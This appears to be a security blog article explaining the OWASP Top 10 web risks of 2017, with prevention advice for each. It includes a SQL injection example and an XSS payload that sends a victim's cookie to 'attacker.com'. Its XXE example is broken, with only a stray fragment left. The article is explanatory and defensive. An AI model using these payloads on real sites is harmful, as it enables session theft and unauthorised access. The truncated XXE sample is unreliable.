Top 10 Common Web Attacks: The First Steps to Protect Your Website

A common statistic often shared by InfoSec professionals is "78% of attacks are against the application".

Not a week goes by without hearing of yet another massive breach or vulnerability, affecting millions of users across all industries. Whether that number is accurate or if it’s actually really only 74% (or more likely closer to 85%), one thing is clear: our websites are at risk, and if yours hasn’t been attacked yet it is just a matter of time and money (and attacker motivation).

One interesting aspect that many of these attacks have in common is that they are not highly technical and achievable only by the advanced teams of hackers sitting in the NSA basement. The most common source of these attacks is a group known as "script kiddies", untrained youngsters who simply download automated toolkits from the internet and attempt to crack any random site that offers easily exploitable low hanging vulnerabilities. Even the more skilled cybercriminals begin their first attempts using the same toolkits (or slightly more advanced versions of them).

Why should we care? Because this means that the most common attacks, and the vulnerabilities most commonly exploited, will always be the first and weakest chain in our defense.

Consequently, this must also be the point at which we concentrate our initial efforts in shoring up that defense. Luckily, it also happens to be the easiest spot to test and ensure at least a minimal level of security.

These common vulnerabilities have been collated into a “Top Ten” list by the friendly volunteers at OWASP – the Open Web Application Security Project, a worldwide not-for-profit charitable organization focused on improving the security of software.

While this Top Ten list is not really a “security checklist”, it is often the first set of vulnerabilities that attackers will attempt. Likewise, there are a plethora of automated tools that will scan your website in service of the attackers, allowing them to quickly discover the critical flaws that will grant them access to your valuables.

Here are OWASP’s Top 10 Application Security Risks, 2017 edition:

1. Injection

An attacker may be able to manipulate your web application into altering the commands submitted to its subsystems, by simply sending malformed requests with tainted payloads. The best known of these attacks is SQL Injection, wherein a user of your website can cause your app to change this:

select * from users where username=’AviD’ and password=’1234’
into this:
select * from users where username=’Admin’

This allows the attacker to login to your application as an administrator, without even knowing the password. Other uses of this attack would be to steal secrets (or money), change data, or even erase all traces of activity.

Other forms include LDAP Injection, XPath Injection, Command Injection, SMTP Injection – any time the application concatenates untrusted user input into a command that is passed to an interpreter. The abnormal data can trick the interpreter into executing unintended commands or accessing data without proper authorization.

These attacks can usually be prevented rather easily by following a few principles:

• Validate all untrusted input with a white-list approach, regardless of source.
• Always access the database with parameterized queries and stored procedures only, instead of concatenating a string query.
• Even better, use a proper ORM (Object Relational Mapping) library (such as Hibernate, Entity Framework, ActiveRecord to name a few, depending on your platform).
• Limit the potential damage of a successful exploit by reducing the application’s database privileges.

2. Broken Authentication

Most applications require their users to login before using it, often with a username/password combination. There are many types of common flaws with this authentication system, which can be exploited in a variety of ways: dictionary attacks, automated brute force, credential stuffing, session hijacking, and more.

An attacker that succeeds in guessing a valid password would be able to impersonate that user and perform any action their victim would be able to do – without being able to differentiate between the attacker and the victim.

Preventing this requires a multi-layer approach:

• Change all default passwords.
• Enforce strong, random passwords for all users: at least 12 random characters, with no constraints, preferably stored in a password manager; or alternatively, a passphrase with at least 5 random words.
• Limit login attempts, locking the user account for a period of time after a certain number of wrong passwords.
• Use a secure platform session manager, which randomly generates long session identifiers and implements a secure session lifecycle.
• Protect passwords with a cryptographic “password hash” algorithm, such as Bcrypt, scrypt, or Argon2.

Also, consider implementing multi-factor authentication to mitigate password-based attacks, and do not allow an attacker to bypass your password by knowing the name of your cat in the “Forgot Password” page. There are a few additional details that may be relevant, depending on your specific architecture and context.

3. Sensitive Data Exposure

Secret data usually needs to be protected with encryption and other cryptographic algorithms. However, this is too often implemented, if at all, in an incomplete manner, allowing attackers to grab sensitive information they should not be able to, including passwords, credit cards, personal information (PII), and other business-critical data.

Some common flaws include not encrypting data; creating a custom encryption scheme instead of standard algorithms and protocols; using weak keys; exposing encryption keys; and not implementing protocols correctly, e.g. not validating a TLS certificate.

Using proper cryptographic controls (such as AES encryption for stored data and TLS with HSTS enabled for traffic), with the correct parameters, should amply protect your sensitive data both at rest and in transit.

4. XML External Entities (XXE)

Often, applications need to receive and process XML documents from users. Old or poorly configured XML parsers can enable an XML feature known as external entity references within XML documents, which when evaluated will embed the contents of another file. Attackers can abuse this to read confidential data, access internal systems, and even shut down the application in a Denial of Service (DoS) attack.

For example, an XML document containing this:

]>&xxe;

would include the contents of the password file within the XML document.

This can be prevented by simply disabling DTD and External entity evaluation in the parser, or upgrading to a modern parser library that is not vulnerable.

5. Broken Access Control

Most web applications limit what users can see or do, whether it is accessing another user’s personal data or a restricted area.

However, the access control mechanisms that enforce these limits are usually bespoke implementations and often deeply flawed. Attackers can bypass these controls or abuse them to access unauthorized functionality or data, such as access other users' accounts, view sensitive files, modify other users' data, perform administrative actions, and more.

Fixing and preventing access control flaws does require a systemic view. A complete, in-depth review of all the application’s features, system requirements, user roles, and other constraints is necessary. There are various common models that can be applied, depending on the requirements. The most common ones include Role Based Access Control (RBAC), Discretionary Access Control (DAC), and Integrity based or Mandatory Access Control (MAC).

Other more niche models can be based on Attributes (ABAC), Policy (PBAC), Context (CBAC), and classification (several models exist, especially in the DoD), as well as various other custom schemes. It is important to design the access control model well, such that it can be applied uniformly and administered efficiently. Start from the principle of Least Privilege, and only authorize where necessary.

Additionally, many systems need to consider applying controls on access to users’ personal data from a privacy perspective. It is becoming even more important to adequately preserve users’ privacy and prevent access without consent, especially in light of the EU’s GDPR update.

6. Security Misconfiguration

Servers and applications have a lot of moving parts that all need to be configured properly. This applies at all levels of the application stack, from the operating system and network devices up to the web server and the application itself.

Default, incomplete, or ad hoc configurations can leave files unprotected, default passwords enabled, cloud services opened, and leak sensitive information through error messages or HTTP headers, as well as numerous other insecure settings that could allow an attacker to gain access to the system or data.

Of course, there is no single setting that would prevent this vulnerability. All potentially vulnerable settings should be reviewed. Note that this also includes timely system updates and patches!

7. Cross-Site Scripting (XSS)

Using XSS, an attacker can modify the webpages that other users see in your application, whether this is to steal information such as passwords and credit cards, spread bogus data, hijack user sessions, redirect to another site, or execute malicious scripts in the victim’s browser.

This vulnerability may occur whenever untrusted data is included in a web page or response, without proper validation or sanitization. The attacker can submit forms with HTML or JavaScript fragments, which will be embedded directly in the page and rendered by the browser.

For example, this server code:

response.write("Good morning, " + request.getParameter("Name"));

embeds the user’s Name parameter directly into the output. This is intended to return the following page, if the user’s name is “John”:

Good Morning, John

Instead, an attacker can inject a malicious payload:

Good Morning, Boss<script>document.location='http://attacker.com/?cookie='+document.cookie</script>

which will be executed by the user’s browser, sending their session cookie to the attacker and allowing the attacker to hijack the session.

The chief protection against XSS attacks is the use of proper encoding. For example, HTML encoding will turn all “special” characters into HTML entities, such that they are displayed the same to the user but are not recognized by the parser as valid HTML tags. However, there are other forms of encoding that ought to be used depending on the specific context of the data output – e.g. Attribute encoding, JavaScript encoding, CSS encoding, and so on. Most modern web platforms provide this functionality automatically or as a function call, and there are plenty of security libraries for those that do not.

Additionally, it is a good idea to implement Content Security Policy (CSP), to prevent the browser from rendering an XSS attack that got through. Also, configure your session cookies (either in your application code or in the web server configuration) to include the HttpOnly attribute, from preventing successful XSS exploits from hijacking your users’ sessions.

8. Insecure Deserialization

The latest entry in this series, Insecure Deserialization, has the potential to allow injection assaults and the escalation of privileges. In specific scenarios, it can even result in remote code implementation and taking over of servers.

Many applications need to serialize objects and data into a format that can be easily transmitted across the wire, or even persisted to a file. When an application restores these objects back into memory by deserializing the formatted data received from a user, it could be possible to tamper with the object’s memory, and even cause it to execute arbitrary functions.

The best way to avoid Insecure Deserialization is to never deserialize objects from untrusted data at all! It is far better to avoid native deserialization formats altogether where possible, preferring instead a data format such as XML or JSON.

If it is necessary to deserialize from the native format, being able to do so safely requires understanding your programming language internals. There are various steps required to do so safely, depending on which language your application was developed. For example, in Java you can subclass the java.io.ObjectInputStream class. Additionally, it is recommended to only deserialize from data that your application digitally signed.

9. Using Components with Known Vulnerabilities

Modern software is not built as a monolith anymore – it always relies on an increasingly large number of 3rd party components, frameworks, and open source libraries. Any known vulnerabilities found in these dependencies can directly affect your own application as well! Sometimes this will lead to other vulnerabilities on this list, such as injection, remote code execution, or any other flaw that could allow attackers to access sensitive data or actions.

Recently, just such an issue was blamed for the massive Equifax breach, where they did not install a patch for Apache Struts2. Instead, they remained on a version which was known to allow remote attackers to execute arbitrary commands.

The best way to avoid falling into this trap is to review all your dependencies (including the transitive dependencies), and check to see if any of them are currently vulnerable. Implement a process to ensure your application always pulls the latest stable versions of all dependent libraries and components after testing them. In fact, there are currently numerous commercial tools that can track this for your team, as well as OWASP’s free Dependency-Check.

10. Insufficient Logging & Monitoring

While we try to make our systems immune to all possible attacks, realistically we need to accept that some attacks will get through our defenses. However, a resilient defense should include several layers. This includes the possibility of detecting those attacks that succeeded despite all our efforts, preferably as soon as possible.

This could still allow an organization to recover from the attack, or even minimize damages as much as possible. A logging and monitoring mechanism, combined with effective incident response, can prevent attackers from pivoting to additional internal resources, embedding themselves permanently in the organization, and inhibit them from stealing or altering even more data.

Implement a common logging mechanism for the whole application. It is best to use an existing library, such as log4J, but it is not required. The log mechanism should collect all user-initiated actions, runtime errors, and any other sensitive events. Ensure the log data is well protected, and don’t forget to provide the administrators with a search and review interface!

The good news is that most of these are relatively simple problems, and easy to prevent if you know what to look for. Therefore, though this is not a comprehensive list of all the security issues you should be paying attention to, it is definitely one of the best places to start your expedition to a protected website!